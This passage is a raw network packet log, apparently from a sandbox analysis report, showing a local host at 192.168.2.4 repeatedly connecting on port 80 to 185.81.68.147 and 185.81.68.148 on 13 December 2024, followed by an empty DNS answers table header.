Dec 13, 2024 07:48:21.079427004 CET	80	49846	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:21.079451084 CET	80	49836	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:21.079514980 CET	49846	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:21.079540014 CET	49836	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:21.079731941 CET	49846	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:21.079871893 CET	80	49837	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:21.079967022 CET	49837	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:21.079974890 CET	80	49847	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:21.080025911 CET	49847	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:21.080219984 CET	49847	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:21.199506044 CET	80	49846	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:21.199902058 CET	80	49847	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:22.439553976 CET	80	49846	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:22.439634085 CET	49846	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:22.440085888 CET	80	49847	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:22.440135002 CET	49847	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:24.069962025 CET	49846	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:24.070363998 CET	49855	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:24.070631027 CET	49847	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:24.070883989 CET	49856	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:24.190351963 CET	80	49846	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:24.190447092 CET	49846	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:24.190455914 CET	80	49855	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:24.190565109 CET	80	49856	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:24.190677881 CET	49855	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:24.190777063 CET	49856	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:24.190804958 CET	80	49847	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:24.191977024 CET	49847	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:24.194046974 CET	49855	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:24.195647955 CET	49856	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:24.313750029 CET	80	49855	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:24.315453053 CET	80	49856	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:25.533108950 CET	80	49856	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:25.533309937 CET	49856	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:25.533883095 CET	80	49855	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:25.534477949 CET	49855	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:27.038974047 CET	49856	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:27.039442062 CET	49862	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:27.039494038 CET	49855	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:27.039710999 CET	49863	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:27.159205914 CET	80	49856	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:27.159219027 CET	80	49862	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:27.159332037 CET	49862	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:27.159400940 CET	49856	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:27.159492970 CET	80	49863	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:27.159550905 CET	49863	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:27.159646034 CET	49862	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:27.159661055 CET	80	49855	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:27.159753084 CET	49855	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:27.159869909 CET	49863	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:27.281754017 CET	80	49862	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:27.281775951 CET	80	49863	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:28.517689943 CET	80	49862	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:28.518207073 CET	80	49863	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:28.519011021 CET	49863	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:28.519140005 CET	49862	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:30.147419930 CET	49863	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:30.147429943 CET	49862	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:30.147833109 CET	49874	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:30.147862911 CET	49875	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:30.267582893 CET	80	49863	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:30.267640114 CET	49863	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:30.267738104 CET	80	49875	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:30.267755032 CET	80	49874	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:30.267940998 CET	49875	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:30.267957926 CET	49874	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:30.268120050 CET	80	49862	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:30.268177032 CET	49862	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:30.268210888 CET	49875	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:30.268290043 CET	49874	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:30.388374090 CET	80	49875	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:30.388392925 CET	80	49874	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:31.617827892 CET	80	49875	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:31.617897034 CET	49875	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:31.617913961 CET	80	49874	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:31.618071079 CET	49874	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:33.131393909 CET	49875	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:33.131386995 CET	49874	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:33.131546974 CET	49881	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:33.132002115 CET	49882	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:33.251240015 CET	80	49881	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:33.251416922 CET	49881	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:33.251629114 CET	49881	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:33.251636028 CET	80	49882	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:33.251929998 CET	80	49875	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:33.252027035 CET	49875	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:33.252027035 CET	49882	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:33.252262115 CET	49882	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:33.252450943 CET	80	49874	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:33.253545046 CET	49874	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:33.371828079 CET	80	49881	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:33.372318983 CET	80	49882	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:34.642431974 CET	80	49882	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:34.643469095 CET	80	49881	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:34.643569946 CET	49881	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:34.644011021 CET	49882	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:36.274173975 CET	49881	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:36.274307013 CET	49882	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:36.274548054 CET	49893	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:36.274605989 CET	49894	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:36.394246101 CET	80	49893	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:36.394310951 CET	80	49894	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:36.394325972 CET	49893	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:36.394397020 CET	49894	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:36.394649029 CET	49893	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:36.394655943 CET	80	49881	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:36.394725084 CET	49881	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:36.394809961 CET	49894	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:36.395204067 CET	80	49882	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:36.395251989 CET	49882	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:36.514288902 CET	80	49893	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:36.514586926 CET	80	49894	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:37.974992037 CET	80	49893	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:37.975018024 CET	80	49894	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:37.975070953 CET	49893	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:37.975104094 CET	49894	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:39.491992950 CET	49893	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:39.492189884 CET	49900	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:39.492551088 CET	49894	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:39.492726088 CET	49901	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:39.611903906 CET	80	49900	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:39.611990929 CET	49900	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:39.612216949 CET	49900	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:39.612437010 CET	80	49901	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:39.612639904 CET	49901	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:39.612792969 CET	49901	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:39.613114119 CET	80	49893	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:39.613198996 CET	49893	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:39.613348961 CET	80	49894	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:39.613404036 CET	49894	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:39.731873035 CET	80	49900	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:39.732501984 CET	80	49901	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:40.970432997 CET	80	49900	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:40.970500946 CET	49900	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:40.971540928 CET	80	49901	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:40.971606970 CET	49901	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:42.600126028 CET	49900	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:42.600183010 CET	49901	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:42.600471973 CET	49907	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:42.600559950 CET	49908	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:42.720247030 CET	80	49907	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:42.720263958 CET	80	49908	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:42.720278978 CET	80	49900	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:42.720391035 CET	49907	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:42.720391035 CET	49900	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:42.720436096 CET	49908	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:42.720627069 CET	49907	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:42.720639944 CET	49908	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:42.720726013 CET	80	49901	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:42.720784903 CET	49901	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:42.840287924 CET	80	49907	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:42.840382099 CET	80	49908	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:44.063769102 CET	80	49907	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:44.063879013 CET	49907	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:44.064337015 CET	80	49908	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:44.064395905 CET	49908	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:45.569817066 CET	49908	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:45.569924116 CET	49907	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:45.570199966 CET	49919	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:45.570298910 CET	49920	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:45.689986944 CET	80	49908	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:45.690026045 CET	80	49919	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:45.690068960 CET	80	49920	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:45.690164089 CET	49908	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:45.690222025 CET	49919	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:45.690222025 CET	49920	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:45.690320015 CET	80	49907	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:45.690392017 CET	49907	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:45.690417051 CET	49919	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:45.690882921 CET	49920	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:45.810069084 CET	80	49919	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:45.810551882 CET	80	49920	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:47.050899982 CET	80	49919	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:47.050945044 CET	80	49920	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:47.051052094 CET	49920	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:47.051075935 CET	49919	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:48.678711891 CET	49919	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:48.679076910 CET	49926	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:48.679569006 CET	49920	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:48.679743052 CET	49927	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:48.798846006 CET	80	49926	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:48.798937082 CET	49926	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:48.799082041 CET	80	49919	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:48.799145937 CET	49919	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:48.799166918 CET	49926	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:48.799478054 CET	80	49927	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:48.799551964 CET	49927	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:48.799683094 CET	49927	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:48.799695015 CET	80	49920	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:48.802017927 CET	49920	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:48.918915987 CET	80	49926	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:48.919433117 CET	80	49927	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:50.142918110 CET	80	49927	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:50.142980099 CET	49927	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:50.143004894 CET	80	49926	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:50.143057108 CET	49926	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:51.649914026 CET	49927	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:51.650279999 CET	49938	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:51.650444031 CET	49926	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:51.650696039 CET	49939	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:51.843286037 CET	80	49927	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:51.843298912 CET	80	49938	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:51.843310118 CET	80	49939	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:51.843327999 CET	80	49926	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:51.843347073 CET	49927	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:51.843411922 CET	49926	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:51.843427896 CET	49939	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:51.843430042 CET	49938	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:51.843974113 CET	49938	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:51.844192982 CET	49939	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:51.963664055 CET	80	49938	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:51.963871002 CET	80	49939	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:53.239470005 CET	80	49938	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:53.239578962 CET	80	49939	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:53.239614010 CET	49938	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:53.239805937 CET	49939	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:54.901649952 CET	49939	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:54.901909113 CET	49945	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:54.902249098 CET	49938	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:54.902250051 CET	49946	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:55.021694899 CET	80	49945	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:55.021823883 CET	80	49939	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:55.021900892 CET	49945	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:55.021967888 CET	80	49946	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:55.022057056 CET	49946	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:55.022057056 CET	49939	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:55.022243977 CET	80	49938	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:55.023924112 CET	49938	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:55.053936005 CET	49946	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:55.053939104 CET	49945	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:55.173743963 CET	80	49946	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:55.173760891 CET	80	49945	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:56.359826088 CET	80	49946	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:56.359895945 CET	49946	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:56.359931946 CET	80	49945	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:56.359982967 CET	49945	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:56.894324064 CET	49946	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:56.894325018 CET	49945	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:57.014656067 CET	80	49946	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:57.015022993 CET	80	49945	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:57.015108109 CET	49946	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:57.015110016 CET	49945	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:58.139494896 CET	49952	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:58.140250921 CET	49953	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:58.259522915 CET	80	49952	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:58.259634018 CET	49952	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:58.260066986 CET	80	49953	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:58.260126114 CET	49953	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:58.260186911 CET	49952	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:48:58.260914087 CET	49953	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:58.379887104 CET	80	49952	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:58.380578041 CET	80	49953	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:59.678570032 CET	80	49953	185.81.68.148	192.168.2.4
Dec 13, 2024 07:48:59.678631067 CET	49953	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:48:59.706650019 CET	80	49952	185.81.68.147	192.168.2.4
Dec 13, 2024 07:48:59.706790924 CET	49952	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:01.302854061 CET	49953	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:01.302921057 CET	49963	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:01.333477020 CET	49952	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:01.336709023 CET	49964	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:01.423086882 CET	80	49953	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:01.423171043 CET	49953	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:01.423197985 CET	80	49963	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:01.423516035 CET	49963	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:01.423562050 CET	49963	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:01.453623056 CET	80	49952	185.81.68.147	192.168.2.4
Dec 13, 2024 07:49:01.453876019 CET	49952	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:01.456440926 CET	80	49964	185.81.68.147	192.168.2.4
Dec 13, 2024 07:49:01.456662893 CET	49964	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:01.456741095 CET	49964	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:01.543345928 CET	80	49963	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:01.576523066 CET	80	49964	185.81.68.147	192.168.2.4
Dec 13, 2024 07:49:02.785298109 CET	80	49963	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:02.786431074 CET	49963	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:02.833879948 CET	49752	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:02.834275961 CET	49748	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:02.838046074 CET	80	49964	185.81.68.147	192.168.2.4
Dec 13, 2024 07:49:02.838294983 CET	49964	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:03.019500971 CET	49753	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:03.019588947 CET	49749	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:03.301937103 CET	49748	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:03.316134930 CET	49752	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:03.409668922 CET	49753	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:03.425668001 CET	49749	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:03.930085897 CET	49748	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:04.018990993 CET	49752	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:04.081202984 CET	49753	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:04.128278017 CET	49749	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:04.303687096 CET	49963	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:04.304079056 CET	49970	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:04.350166082 CET	49964	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:04.350694895 CET	49971	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:04.423846006 CET	80	49963	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:04.423887968 CET	80	49970	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:04.423909903 CET	49963	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:04.423958063 CET	49970	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:04.424305916 CET	49970	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:04.470163107 CET	80	49964	185.81.68.147	192.168.2.4
Dec 13, 2024 07:49:04.470221996 CET	49964	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:04.470453024 CET	80	49971	185.81.68.147	192.168.2.4
Dec 13, 2024 07:49:04.470532894 CET	49971	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:04.470860004 CET	49971	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:04.544013023 CET	80	49970	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:04.590632915 CET	80	49971	185.81.68.147	192.168.2.4
Dec 13, 2024 07:49:05.237987995 CET	49752	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:05.315751076 CET	49748	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:05.315752983 CET	49753	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:05.432454109 CET	49749	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:05.785996914 CET	80	49970	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:05.786107063 CET	49970	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:05.831302881 CET	80	49971	185.81.68.147	192.168.2.4
Dec 13, 2024 07:49:05.831377029 CET	49971	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:07.411752939 CET	49970	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:07.412136078 CET	49982	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:07.459168911 CET	49971	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:07.459222078 CET	49983	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:07.532526016 CET	80	49982	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:07.532605886 CET	80	49970	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:07.532656908 CET	49982	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:07.532708883 CET	49970	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:07.532891035 CET	49982	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:07.578892946 CET	80	49983	185.81.68.147	192.168.2.4
Dec 13, 2024 07:49:07.578963041 CET	49983	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:07.579169035 CET	80	49971	185.81.68.147	192.168.2.4
Dec 13, 2024 07:49:07.579220057 CET	49971	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:07.653279066 CET	80	49982	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:07.743813038 CET	49748	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:07.816020966 CET	49752	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:07.883212090 CET	49753	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:07.925242901 CET	49749	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:08.876770973 CET	80	49982	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:08.876996040 CET	49982	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:12.617927074 CET	49748	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:12.628253937 CET	49752	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:12.815761089 CET	49753	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:49:12.831415892 CET	49749	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:49:13.890316963 CET	80	49982	185.81.68.148	192.168.2.4
Dec 13, 2024 07:49:13.890463114 CET	49982	80	192.168.2.4	185.81.68.148

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
